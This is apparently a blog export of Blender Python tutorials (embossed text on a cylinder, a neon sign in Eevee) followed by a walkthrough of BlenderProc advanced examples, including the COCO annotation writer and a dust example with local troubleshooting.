text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

8. Decimate it to reduce the edge count:

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

9. Shade smooth:

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cylinder_obj.data.use_auto_smooth = True

10. Create an Empty at the same location as the Text to drive the bend:

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

11. Bend the Text with a SimpleDeform modifier:

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 2
text_modifier_simple_deform.deform_axis = "Y"

12. The simplest way to get the emboss is Object → Join, as sketched below.
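The Join route in script form, as a minimal sketch (join() merges every selected object into the active one, so select exactly these two and make the cylinder active):

# Deselect everything, then select the text and the cylinder
bpy.ops.object.select_all(action="DESELECT")
text_obj.select_set(True)
cylinder_obj.select_set(True)
# The active object receives the joined geometry
bpy.context.view_layer.objects.active = cylinder_obj
bpy.ops.object.join()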

13. If you skip Join and use a Boolean operation instead:

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.operation = "UNION"
cylinder_modifier_boolean.object = text_obj

14. Add a Bevel modifier for a chamfered edge, then hide the text:

cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
cylinder_modifier_bevel.width = 0.005
cylinder_modifier_bevel.segments = 5
cylinder_modifier_bevel.use_clamp_overlap = False
cylinder_modifier_bevel.harden_normals = True

text_obj.hide_viewport = True
text_obj.hide_render = True

15. If the mesh breaks, the only fix is to fill in the edges manually.


Complete code:

import bpy
import numpy as np

bpy.ops.mesh.primitive_cylinder_add()
cylinder_obj = bpy.context.object

cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
bpy.ops.object.modifier_apply(modifier="EdgeSplit")

cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
cylinder_modifier_subsurf.levels = 2
bpy.ops.object.modifier_apply(modifier="Subdivision")

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.location[0] = 1.1
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.body = "Hello,\nWorld!"

text_obj.data.size = 0.5

text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
text_modifier_solidify.thickness = 0.15

bpy.ops.object.convert(target="MESH")

text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
text_modifier_decimate.decimate_type = "DISSOLVE"
bpy.ops.object.modifier_apply(modifier="Decimate")

bpy.ops.object.shade_smooth()

text_obj.data.use_auto_smooth = True

cylinder_obj.data.use_auto_smooth = True

bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

empty_obj.location[0:3] = text_obj.location[0:3]
empty_obj.rotation_euler[0] = np.pi / 2

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.angle = -np.pi / 2
text_modifier_simple_deform.deform_axis = "Y"

cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cylinder_modifier_boolean.operation = "UNION"
cylinder_modifier_boolean.object = text_obj

cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
cylinder_modifier_bevel.width = 0.005
cylinder_modifier_bevel.segments = 5
cylinder_modifier_bevel.use_clamp_overlap = False
cylinder_modifier_bevel.harden_normals = True

text_obj.hide_viewport = True
text_obj.hide_render = True

Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)

1. Create a Text object and adjust its parameters:

import bpy
import numpy as np
import os

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"
text_obj.data.space_line = 1.2

2. Change the text:

text_obj.data.body = "BARBEQUE\nNATION"

3. Find a neon-style font, such as Neon Future Font | dafont.com, and apply it:

blend_dir = os.path.abspath(os.path.dirname(bpy.data.filepath))
font_path = os.path.join(blend_dir, "fonts", "Neon_Future.ttf")
text_obj.data.font = bpy.data.fonts.load(font_path)

4. Set the extrude:

text_obj.data.extrude = 0.02

5. Add an emission material and set its parameters:

text_material = bpy.data.materials.new(name="Emission")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes

# Copy into a list first: removing while iterating skips nodes
for node in list(nodes):
    nodes.remove(node)

emission_node = nodes.new(type='ShaderNodeEmission')
emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
emission_node.inputs[1].default_value = 4

output_node = nodes.new(type='ShaderNodeOutputMaterial')
links = text_material.node_tree.links
links.new(emission_node.outputs[0], output_node.inputs[0])

text_obj.data.materials.append(text_material)
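Indexed inputs work but read poorly; the Emission node's sockets can be addressed by name instead (same sockets as above):

# inputs[0] is "Color", inputs[1] is "Strength"
emission_node.inputs["Color"].default_value = (0.25, 1, 0.325, 1)
emission_node.inputs["Strength"].default_value = 4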
6. Enable Bloom in the scene settings:

bpy.context.scene.eevee.use_bloom = True
bpy.context.scene.eevee.bloom_radius = 3
bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
bpy.context.scene.eevee.bloom_intensity = 0.25
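These Bloom settings exist only in the legacy Eevee engine; they were dropped in Blender 4.2's Eevee Next, which relies on compositor glare instead. A hedged guard if the script may run on newer builds:

# Skip the bloom block on engines that no longer expose it
if hasattr(bpy.context.scene.eevee, "use_bloom"):
    bpy.context.scene.eevee.use_bloom = True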
7. Create a plane to catch the neon light:

bpy.ops.mesh.primitive_plane_add()
plane_obj = bpy.context.object
plane_obj.rotation_euler[1] = np.pi / 2
plane_obj.scale[0] = 2.5
plane_obj.scale[1] = 3.5
plane_obj.location[0] = -0.25

8. Find a wall texture online and give the plane a textured material:

plane_material = bpy.data.materials.new(name="Wall")
plane_material.use_nodes = True
nodes = plane_material.node_tree.nodes

image_texture_node = nodes.new(type='ShaderNodeTexImage')
image_texture_node.image = bpy.data.images.load(os.path.join(blend_dir, "texture", "Wall.jpg"))

9. Adjust the shader nodes to rotate the texture:

mapping_node = nodes.new(type='ShaderNodeMapping')
mapping_node.inputs[2].default_value[2] = np.pi / 2

texcoord_node = nodes.new(type="ShaderNodeTexCoord")

links = plane_material.node_tree.links
links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

plane_obj.data.materials.append(plane_material)
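On the Mapping node, inputs[2] is the "Rotation" socket; naming it avoids the magic index (identical effect to the line above):

# Rotate the texture 90° around Z via the named socket
mapping_node.inputs["Rotation"].default_value[2] = np.pi / 2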
10. Add an irradiance-volume light probe:

bpy.ops.object.lightprobe_add(type="GRID")

11. Scale the Light Probe so it encloses the plane and the text:

lightprobe_obj = bpy.context.object
lightprobe_obj.scale[0:3] = [1, 3.5, 2]

12. Bake Cubemap Only (see the sketch below).
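The "Bake Cubemap Only" button lives in Render Properties → Indirect Lighting. A hedged script equivalent for legacy Eevee; my assumption is that the subset argument matches that button, and dropping it bakes the whole light cache:

# Bake only the reflection cubemaps of the light cache
bpy.ops.scene.light_cache_bake(subset="CUBEMAPS")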

13. Lower the background strength and enable Screen Space Reflections:

bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
bpy.context.scene.eevee.use_ssr = True

14. Add point lights to fill in some brightness:

light_obj_list = []
for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
        light_obj_list[-1].location[1] = -2 + i
        light_obj_list[-1].location[2] = 0.5
    else:
        light_obj_list[-1].location[1] = -6 + i
        light_obj_list[-1].location[2] = -0.5

Complete code:

import bpy
import numpy as np
import os

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"
text_obj.data.space_line = 1.2

text_obj.data.extrude = 0.02

text_obj.data.body = "BARBEQUE\nNATION"
blend_dir = os.path.abspath(os.path.dirname(bpy.data.filepath))
font_path = os.path.join(blend_dir, "fonts", "Neon_Future.ttf")
text_obj.data.font = bpy.data.fonts.load(font_path)

text_material = bpy.data.materials.new(name="Emission")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes

for node in list(nodes):
    nodes.remove(node)

emission_node = nodes.new(type='ShaderNodeEmission')
emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
emission_node.inputs[1].default_value = 4

output_node = nodes.new(type='ShaderNodeOutputMaterial')
links = text_material.node_tree.links
links.new(emission_node.outputs[0], output_node.inputs[0])

text_obj.data.materials.append(text_material)

bpy.context.scene.eevee.use_bloom = True
bpy.context.scene.eevee.bloom_radius = 3
bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
bpy.context.scene.eevee.bloom_intensity = 0.25

bpy.ops.mesh.primitive_plane_add()
plane_obj = bpy.context.object
plane_obj.rotation_euler[1] = np.pi / 2
plane_obj.scale[0] = 2.5
plane_obj.scale[1] = 3.5
plane_obj.location[0] = -0.25

plane_material = bpy.data.materials.new(name="Wall")
plane_material.use_nodes = True
nodes = plane_material.node_tree.nodes

image_texture_node = nodes.new(type='ShaderNodeTexImage')
image_texture_node.image = bpy.data.images.load(os.path.join(blend_dir, "texture", "Wall.jpg"))

mapping_node = nodes.new(type='ShaderNodeMapping')
mapping_node.inputs[2].default_value[2] = np.pi / 2

texcoord_node = nodes.new(type="ShaderNodeTexCoord")

links = plane_material.node_tree.links
links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

plane_obj.data.materials.append(plane_material)

bpy.ops.object.lightprobe_add(type="GRID")
lightprobe_obj = bpy.context.object
lightprobe_obj.scale[0:3] = [1, 3.5, 2]

bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
bpy.context.scene.eevee.use_ssr = True

light_obj_list = []
for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
        light_obj_list[-1].location[1] = -2 + i
        light_obj_list[-1].location[2] = 0.5
    else:
        light_obj_list[-1].location[1] = -6 + i
        light_obj_list[-1].location[2] = -0.5
    ]]>
    @@ -6180,7 +6180,7 @@ /posts/Diary-%E5%B9%B3%E6%B7%A1%E7%9A%84%E7%AC%AC%2015%20%E5%91%A8%E5%92%8C%E7%96%AF%E7%8B%82%E7%9A%84%E7%AC%AC%2016%20%E5%91%A8/ -
    ]]>
    +
    ]]>
@@ -6236,7 +6236,7 @@ /posts/Diary-%E6%B4%A5%E4%BA%86%EF%BC%88%E6%BB%A8%E6%B5%B7%E7%AF%87%EF%BC%89/ -
@@ -6265,7 +6265,7 @@ /posts/Blender-BlenderProc%20Examples%20overview-Advanced%20Examples/ - Resources

Repository: DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com). Download it locally, open it with Python, and use the previously created blender environment as the interpreter.

Course

    Auto shading

    Usage

    blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output
    • examples/advanced/auto_shading/main.py: path to the main python file to run.
    • examples/advanced/auto_shading/camera_position: text file with parameters of camera positions.
    • examples/advanced/auto_shading/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/auto_shading/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

    png

    Code

    # Find the object with name "Sphere"
    sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
    # Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
    sphere.set_shading_mode("auto", 45)

    # Find the object with name "Sphere.001"
    other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
# Set it to smooth shading, so all angles will be shaded smooth.
    other_sphere.set_shading_mode("smooth")
• Call bproc.filter.one_by_attr(objs, "name", "Sphere") to find the object named "Sphere" and assign it to the variable sphere.

• Call sphere.set_shading_mode("auto", 45) to set sphere's shading mode to AUTO, which picks flat or smooth shading automatically from each face's angle. The threshold argument 45 means that faces whose angle exceeds 45 degrees are shaded flat, the rest smooth.

• Call bproc.filter.one_by_attr(objs, "name", "Sphere.001") to find the object named "Sphere.001" and assign it to the variable other_sphere.

• Call other_sphere.set_shading_mode("smooth") to set other_sphere's shading mode to SMOOTH, so that every face is shaded smooth.

    Camera Depth of Field

    Usage

    blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output
    • examples/advanced/camera_depth_of_field/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/camera_depth_of_field/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

    png

    Code

Set up the focus point:

    # Create an empty object which will represent the cameras focus point
    focus_point = bproc.object.create_empty("Camera Focus Point")
    focus_point.set_location([0.5, -1.5, 3])
    # define the camera intrinsics
    bproc.camera.set_resolution(512, 512)
    # Set the empty object as focus point and set fstop to regulate the sharpness of the scene
    bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

First, bproc.camera.set_resolution(512, 512) sets the camera resolution to 512x512 pixels.

Then bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) adds a depth-of-field effect. Here focus_point is the focal target the camera focuses on (typically the scene center), and fstop_value controls how shallow the depth of field is: the smaller the value, the stronger the effect. With fstop_value set to 0.25, the rendered scene shows a fairly pronounced depth of field.
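
To make the effect of fstop_value concrete: per the explanation above, a larger f-stop should widen the in-focus range. A minimal sketch, assuming the same focus_point as in the example (the value is illustrative):

# Sketch: a larger f-stop keeps more of the scene in focus (weaker blur)
bproc.camera.add_depth_of_field(focus_point, fstop_value=2.8)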

    COCO annotations

    Usage

    blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output
    • examples/advanced/coco_annotations/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/coco_annotations/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/coco_annotations/output: path to the output directory.

    Visualization

An example command for visualizing COCO-format data with blenderproc:

    blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

The files generated in COCO dataset form:

    png

The contents of coco_annotations.json (it feels like a pile of gibberish got stored in there):

{
    "info": {
        "description": "coco_annotations",
        "url": "https://github.com/waspinator/pycococreator",
        "version": "0.1.0",
        "year": 2020,
        "contributor": "Unknown",
        "date_created": "2023-06-04 23:59:39.563796"
    },
    "licenses": [
        {
            "id": 1,
            "name": "Attribution-NonCommercial-ShareAlike License",
            "url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
        }
    ],
    "categories": [
        {
            "id": 1,
            "supercategory": "coco_annotations",
            "name": "Suzanne"
        },

        ...

        {
            "id": 9,
            "supercategory": "coco_annotations",
            "name": "Cube.001"
        }
    ],
    "images": [
        {
            "id": 0,
            "file_name": "images/000000.jpg",
            "width": 512,
            "height": 512,
            "date_captured": "2023-06-04 23:59:39.563796",
            "license": 1,
            "coco_url": "",
            "flickr_url": ""
        },
        {
            "id": 1,
            "file_name": "images/000001.jpg",
            "width": 512,
            "height": 512,
            "date_captured": "2023-06-04 23:59:39.672089",
            "license": 1,
            "coco_url": "",
            "flickr_url": ""
        }
    ],
    "annotations": [
        {
            "id": 1,
            "image_id": 0,
            "category_id": 1,
            "iscrowd": 0,
            "area": 8330,
            "bbox": [184, 98, 144, 114],
            "segmentation": {
                "counts": [94341, ..., 94583],
                "size": [512, 512]
            },
            "width": 512,
            "height": 512
        },

        ...

        {
            "id": 16,
            "image_id": 1,
            "category_id": 9,
            "iscrowd": 0,
            "area": 25473,
            "bbox": [0, 456, 512, 56],
            "segmentation": {
                "counts": [460, ..., 34],
                "size": [512, 512]
            },
            "width": 512,
            "height": 512
        }
    ]
}

In this example:

    blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

Then you'll be treated to an error:

    AttributeError: module 'numpy' has no attribute 'bool'.
    `np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
    The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
    https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

In vis_coco_annotation.py, find the line that uses np.bool and change it to the builtin bool, as the error message suggests.
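
A hypothetical before/after illustration of that one-line patch (the actual variable names in vis_coco_annotation.py will differ):

# before: np.bool was deprecated in NumPy 1.20 and later removed
mask = segmentation.astype(np.bool)
# after: use the plain builtin instead
mask = segmentation.astype(bool)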

    png

Run it again!

    png

    Code

# Set some category ids for loaded objects
for j, obj in enumerate(objs):
    obj.set_cp("category_id", j + 1)

To create COCO annotations, we need to render instance and class maps. Classes are defined via the custom property "category_id", which must be defined beforehand for every instance. The category_id can be set through custom properties as above, in a loader, or directly in the .blend file. We also add "name" to the mapping so that the COCO annotation writer can later label categories with the objects' names.


    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

Calling bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"]) activates segmentation rendering.

Here "category_id", "instance" and "name" are three different labeling modes: by class, by object instance, and by name.

The function labels every object in the scene according to the selected modes and stores the labels in the render output. For example, with "category_id" each object is assigned a unique integer ID indicating the class it belongs to.


# Write data to coco file
bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
                                    instance_segmaps=data["instance_segmaps"],
                                    instance_attribute_maps=data["instance_attribute_maps"],
                                    colors=data["colors"],
                                    color_file_format="JPEG")

Use bproc.writer.write_coco_annotations() to generate the COCO dataset.

The function stores the annotations in coco_annotations.json. Optionally, you can set "supercategory": "<some_supercategory>" in the writer.CocoAnnotationsWriter config to filter objects by the previously assigned custom property "supercategory".

Calling bproc.writer.write_coco_annotations() writes the scene's segmentation and attribute information into a COCO-format annotation file.

Where:

• os.path.join(args.output_dir, 'coco_data') is the path under which the annotation file is saved
• instance_segmaps, instance_attribute_maps and colors are the instance segmentation maps, per-instance attribute maps and color data, all extracted from the render output
• color_file_format is the format in which the color images are saved, here JPEG.
• The function automatically converts the given segmentation and attribute information to COCO format and saves it to the annotation file under the given path.

    bproc.writer.write_coco_annotations()

def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
                           instance_attribute_maps: Optional[List[dict]] = None,
                           colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
                           mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
                           append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
                           segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
                           jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
                           file_prefix: str = "", indent: Optional[Union[int, str]] = None):

The function writes the COCO annotations in the following steps:

1. Locate the segmentation images
2. Locate the RGB images
3. Locate the seg mappings
4. Read the color mappings
5. For each frame, write the coco annotations

The parameters are as follows (a minimal call sketch follows this list):

• output_dir: output directory in which to write the coco annotations
• instance_segmaps: list of instance segmentation maps
• instance_attribute_maps: per-frame mappings with idx, class and optionally supercategory/bop_dataset_name
• colors: list of color images. Stereo images are not supported; pass the left and right inputs separately, one after the other.
• color_file_format: format in which to save the color images
• mask_encoding_format: encoding format for binary masks. Default: 'rle'. Available values: 'rle', 'polygon'
• supercategory: name of the dataset/supercategory to filter for, e.g. a specific BOP dataset set via 'bop_dataset_name', or any loaded object with a matching custom property 'cp_supercategory'
• append_to_existing_output: if true and a coco_annotations.json already exists in the output directory, the new coco annotations are appended to the existing file, and the rgb images are named so as to avoid collisions.
• segmap_output_key: output key of the segmentation images. Should match the output key of the SegMapRenderer module. Default: 'segmap'.
• segcolormap_output_key: output key of the CSV file registered for the object name/class correspondence. Should match the colormap_output_key of the SegMapRenderer module. Default: 'segcolormap'.
• rgb_output_key: output key of the RGB images. Should match the output key of the RgbRenderer module. Default: 'colors'.
• jpg_quality: desired quality level of the jpg encoding
• label_mapping: label mapping used to label categories by their IDs. If None, the name field from the csv file is used, or, if that is absent, the category ID itself.
• file_prefix: optional prefix for the image file names
• indent: if indent is a non-negative integer or string, the annotation output is pretty-printed at that indent level. An indent of 0, a negative number, or "" inserts newlines only. None (the default) selects the most compact representation. A positive integer indents each level by that many spaces; a string such as "\t" is used to indent each level.
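
A minimal call sketch under the defaults documented above; output_dir is the only required argument, and everything else falls back to the registered renderer outputs:

# Sketch: write compact JSON to <output_dir>/coco_annotations.json,
# locating segmaps/RGB images via the registered renderer outputs
bproc.writer.write_coco_annotations("output/coco_data",
                                    mask_encoding_format="rle",
                                    append_to_existing_output=True)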

# Type-check the three optional arguments and normalize them to lists; None becomes an empty list
instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
colors = [] if colors is None else list(colors)
# (odd that the code style here differs from the lines above)
if instance_attribute_maps is None:
    instance_attribute_maps = []

# If colors[0] is a four-dimensional array, raise a ValueError: BlenderProc cannot write coco
# annotations for stereo images; left and right images/segmaps have to be passed separately.
if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
                     "However, you can enter left and right images / segmaps separately.")

# Create output directory
# The 'images' subdirectory stores the converted images; if it already exists, nothing happens
os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

# These blocks locate the paths of the RGB images, instance segmentation maps and attribute maps produced at render time
if not instance_segmaps:
    # If the instance_segmaps list is empty, look up the path of the segmentation images
    # among the registered outputs via Utility.find_registered_output_by_key()
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
        # No output registered under segmap_output_key: remind the user to run the SegMapRenderer module first
        raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
                           f"ran the SegMapRenderer module before?")

if not colors:
    # Find path pattern of rgb images
    # If the colors list is empty, look up the path of the RGB images
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
        # No output registered under rgb_output_key: remind the user to run the RgbRenderer module first
        raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
                           f"ran the RgbRenderer module before?")

if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # If the instance_attribute_maps list is empty, look up the csv file that maps
    # instance segmaps to object names/class labels
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
        # No output registered under segcolormap_output_key: remind the user to run the
        # SegMapRenderer module with 'map_by' set to 'instance' first
        raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
                           f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

# Determine the path of the COCO annotation file and, when appending, compute the image numbering offset
coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
# Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
if append_to_existing_output and os.path.exists(coco_annotations_path):
    # If append_to_existing_output is True and a 'coco_annotations.json' already exists, load it into memory
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
        existing_coco_annotations = json.load(fp)
    # Use the maximum existing image id plus one as the numbering offset,
    # so the newly generated annotations do not collide with the existing file
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
else:
    # With append_to_existing_output False or no existing annotation file,
    # start numbering at 0 and set existing_coco_annotations to None
    image_offset = 0
    existing_coco_annotations = None

# collect all RGB paths
new_coco_image_paths = []
# collect all mappings from csv (backwards compat)
segcolormaps = []
# collect all instance segmaps (backwards compat)
inst_segmaps = []

# for each rendered frame
# Iterate over every frame from bpy.context.scene.frame_start to bpy.context.scene.frame_end
for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # If instance_attribute_maps is empty, read the colormapping file (segcolormap_output), which maps
    # object names/classes to integers, and store it in the segcolormaps list
    if not instance_attribute_maps:
        # read colormappings, which include object name/class to integer mapping
        segcolormap = []
        with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
            reader = csv.DictReader(csvfile)
            for mapping in reader:
                segcolormap.append(mapping)
        segcolormaps.append(segcolormap)

    # If instance_segmaps is empty, load the segmentation image (segmentation_map_output), extract the
    # instance channel (channel_instance) and store the instance segmap in inst_segmaps
    if not instance_segmaps:
        # Load segmaps (backwards compat)
        segmap = np.load(segmentation_map_output["path"] % frame)
        inst_channel = int(segcolormap[0]['channel_instance'])
        inst_segmaps.append(segmap[:, :, inst_channel])

    # If colors is non-empty, write the RGB (color render) image to the target path via OpenCV's
    # imwrite(); the path is derived from file_prefix and the numbering offset
    if colors:
        color_rgb = colors[frame - bpy.context.scene.frame_start]

        # Reverse channel order for opencv
        color_bgr = color_rgb.copy()
        color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

        if color_file_format == 'PNG':
            target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
            target_path = os.path.join(output_dir, target_base_path)
            cv2.imwrite(target_path, color_bgr)
        elif color_file_format == 'JPEG':
            target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
            target_path = os.path.join(output_dir, target_base_path)
            cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
        else:
            raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
        # With no explicit color data, simply copy the rendered RGB image to the target path
        source_path = rgb_output["path"] % frame
        target_base_path = os.path.join('images',
                                        file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
        target_path = os.path.join(output_dir, target_base_path)
        shutil.copyfile(source_path, target_path)

    # Append the relative target path to new_coco_image_paths, which is later used in the COCO annotations
    new_coco_image_paths.append(target_base_path)

instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
                                                           instance_attribute_maps,
                                                           new_coco_image_paths,
                                                           supercategory,
                                                           mask_encoding_format,
                                                           existing_coco_annotations,
                                                           label_mapping)

print("Writing coco annotations to " + coco_annotations_path)
with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)

This code passes the collected instance segmentation maps, attribute maps, image paths and the remaining parameters to _CocoWriterUtility.generate_coco_annotations(), which produces the COCO-format annotations. If old COCO annotations exist (existing_coco_annotations), they are merged into the generated ones.

Finally, the annotations are written to the given coco_annotations_path, and the file path is printed to the console.
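
A quick hedged sanity check is to load the written file back and count its entries (the path below is the coco_data directory from the vis command used earlier):

# Sketch: verify the written annotations by counting images and annotations
import json

with open("examples/advanced/coco_annotations/output/coco_data/coco_annotations.json", encoding="utf-8") as fp:
    coco = json.load(fp)
print(len(coco["images"]), "images,", len(coco["annotations"]), "annotations")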

    Diffuse color image

    Usage

    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5

    png

    Code

    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()

    How to apply dust to objects

    Usage

    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
• resources/haven/models/ArmChair_01/ArmChair_01.blend: path to the blend file from the haven dataset; browse the model folder for all possible options
• resources/haven: the folder containing the hdri folder, used to load a world environment
    • examples/datasets/haven/output: path to the output directory.

This one keeps tripping me up, damn it.

Download some Models and HDRIs from Little Paris Eiffel Tower HDRI • Poly Haven:

    png

All the assets on this site are open and free. Nice!

    png

    png

Set the paths and run!

    blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

Then it died: no idea why glob.glob returns an empty list here. After rewriting that bit of code, the stinky thing finally ran.

    png

    Visualization

    blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5

    png

    Code

    # load the objects into the scene
